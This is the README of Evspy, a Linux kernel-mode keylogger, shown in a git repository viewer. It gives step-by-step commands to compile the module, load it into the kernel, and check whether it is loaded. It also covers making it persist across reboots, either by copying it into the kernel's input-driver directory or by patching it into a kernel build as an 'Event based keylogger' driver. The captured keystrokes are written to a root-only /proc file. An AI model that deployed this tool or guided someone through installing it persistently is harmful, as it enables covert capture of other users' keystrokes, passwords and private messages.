blob: 51988392be05fdea7d5d57edf6ef3b0913207382 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
# Evspy
Evspy is a general purpose kernel-mode keylogger in (early) development stage.
The file from where you can read the registered keystrokes is /proc/driver/evspy
by default. Only root can read it. Beware users: evspy can troll you.
Don't be evil.
## COMPILE
`$ make`
## LOAD
`# insmod evspy.ko`
## UNLOAD
`# rmmod evspy`
## IS IT ALREADY LOADED?
`$ modinfo evspy`
## PERSISTENCE
* With dkms:
`# make [install, uninstall]`
* Manually:
Copy it into your kernel module dir:
`# cp evspy.ko /lib/modules/$(uname -r)/kernel/drivers/input/evspy.ko`
and update module database:
`# depmod -a`
(in some distros you could also need to add it to some rc/config file)
Once it has been installed, you can load it when you want with
`# modprobe evspy`
## OTHER
A patch is supplied (evspy.patch) to be able to compile a kernel with evspy
included. If KERN is the directory where your kernel is located, just copy the
patch there (KERN/) and copy all the evspy files (*.c, *.h, maps, kmap) to
KERN/drivers/input/. Then, cd to KERN and apply the patch:
`$ patch -p1 < evspy.patch`
Then you should be able to configure the kernel to include evspy just like
any other module:
`$ make menuconfig`
Device Drivers --> Input device support --> Event based keylogger
`$ ...`
|
